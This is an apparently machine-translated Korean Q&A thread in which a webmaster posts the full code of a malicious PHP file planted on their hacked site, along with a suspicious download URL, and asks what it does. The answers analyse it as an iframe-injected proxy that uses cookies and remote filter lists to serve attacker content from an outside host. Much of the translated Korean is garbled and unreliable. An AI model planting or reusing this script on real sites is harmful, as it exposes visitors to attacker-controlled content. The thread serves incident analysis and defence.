나는 방금 해킹 당했지만 얼마나 중요한지, 왜 그런지 모르겠습니다. 매우 이상한 코드 삽입

Question

편집 : 지금까지 좋은 작품.

난 그냥이 존재 다운로드를 발견하고 내 bash는 역사에 실행 한

:

http://notsoft.ru/glib

(안전 볼)

감사에게 난 그냥했습니다 모든

---

을 내 사이트의 소스 PHP가 편집 된 것으로 나타났습니다. 나는 어떻게 (나는 나의 암호를 모두 바꿨다) 모르지만 정말로 나를 혼란스럽게하는 것은 이유 다.

몇 페이지에서 내 이미지 디렉토리 (HTACCESS가 액세스 할 수있는 유일한 디렉토리)에있는 xml.php 파일에 링크 된 iframe이 배치되었습니다.이 코드는 페이지가 상당히 복잡하므로 배치해야합니다 이러한 페이지를 제동없이 자동 장소가 거의 불가능했을 것이다.

이제 정말 혼란 것은 내가 아무것도하지 않습니다 볼 수있는 것과 같이,이 XML.php 파일의 내용이다.

여기 코드 :

<?php 

$urlIps = "http://mp3magicmag.com/frame/ips.txt"; // Url to IP's 
$urlHtml = "http://mp3magicmag.com/frame/html.code"; // Url to html.code 
$urlUa = "http://mp3magicmag.com/frame/ua.txt"; // Url to User Agent file 

if(isset($_GET['ping'])){ 
    echo "Status: Ping successful!"; die; 
} 
$ip = $_SERVER['REMOTE_ADDR']; 
//orezaem do deapozona 
$exIps = explode(".", $ip); 

$ip = $exIps[0].".".$exIps[1].".".$exIps[2]; 

$ips = file_get_contents($urlIps); 

if(strpos(" ".$ips, $ip)){ // esli nashli IP v file to ostanavlivaem process.. 
    die; 
} 

$arrUa = file($urlUa); 
for($ua=0; $ua<count($arrUa); $ua++){ 
    $userAgent = trim($arrUa[$ua]); 
    if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $userAgent)){ // esli nashli v User Agent'e to ostanavlivaem process.. 
     die; 
    } 
} 


if(isset($_COOKIE['pingshell'])){ // proveriaem est' li kuki 

    echo @file_get_contents($urlHtml); 

}else{ 

?> 
<SCRIPT LANGUAGE="JavaScript"> 
function setCookie (name, value, expires, path, domain, secure) { 
     document.cookie = name + "=" + escape(value) + 
    ((expires) ? "; expires=" + expires : "") + 
    ((path) ? "; path=" + path : "") + 
    ((domain) ? "; domain=" + domain : "") + 
    ((secure) ? "; secure" : ""); 
} 
</SCRIPT> 

<SCRIPT LANGUAGE="JavaScript"> 
setCookie("pingshell", "12345", "Mon, 01-Jan-2099 00:00:00 GMT", "/"); 
</SCRIPT> 
<meta http-equiv="refresh" content="2; url="> 

<?php 
} 
?> 

나는 뭔가를 놓치고 있습니까? 아니면 이상한 "해킹"입니까? 나는 내 인터넷 검색을했는데 전에 어떤 일이 벌어지고 있는지 찾을 수 없다.

Answer 1

바로 다음과 같습니다. 그것이 응답했고

요청 하나에서 온 것이 유효한 서버 IP를하고 검사 목록을 다운로드 종료되면 스크립트가 ping 호출 된 경우

1. 확인이되지 않을 경우 종료, 볼 수 있습니다.
2. 사용자 에이전트 문자열 목록을 다운로드하고 유효하지 않은 경우 브라우저와 일치시킵니다. 그렇지 않으면 종료됩니다.
3. 쿠키 pingshell는 다음 이전에 설정되어있는 HTML 파일을 다운로드하여 전체 도메인에 대해 더미 값으로 pingshell 쿠키를 설정, 브라우저 그렇지 않으면 쿠키 스크립트가 브라우저로 다시 전송됩니다
4. 에 유효 표시되는 경우 .

4 단계는 중요한 비트이며 지정된 위치에서 HTML을 검색하는 프록시 서버처럼 보입니다. 링크가 불법이라면 좋지 않습니다. 아마 마케팅 목적으로도 URL을 사용하여 콘텐츠를 제공하고 사용자의 클릭 연결 데이터를 얻을 수 있습니다.

코드는 그들이 먼저 정보를 캡처하지 않는, 그래서, 규정 된 IP 주소에서 액세스 어떠한 형태의 수가 특정 사람들이 특정 사용하도록 설계되었습니다 것 같다 고 말했다 가졌어요.

Answer 2

귀하의 사이트를 사용하여 쿠키 추적 시스템을 확장하려는 것처럼 보입니다. Status: ping successful은 해킹의 무결성을 정기적으로 점검하는 기능처럼 보입니다. 또한 모든 방문자의 IP 주소를 서버로 보냅니다.

Answer 3

자동 스크립트의 일부처럼 보입니다. 이것은 자동 공격이 성공했는지 확인하고 돌아올 곳의 큰 목록을 순위 지정하는 데 사용됩니다. 다른 것들 사이.

편집

당신이 할 수있는 것은 코드를 직감하고 로그 파일에 대한 호출을 모니터입니다 (욘 브롱는 다른 물건을 제공합니다). 누군가가 그걸로 무엇을하려고하는지보십시오.

Answer 4

안전 모드 원격 안전하지 않은 파일을 열 같은 스크립트를 방지하기 위해 php.ini 파일에서 활성화되어 있는지 확인은 ..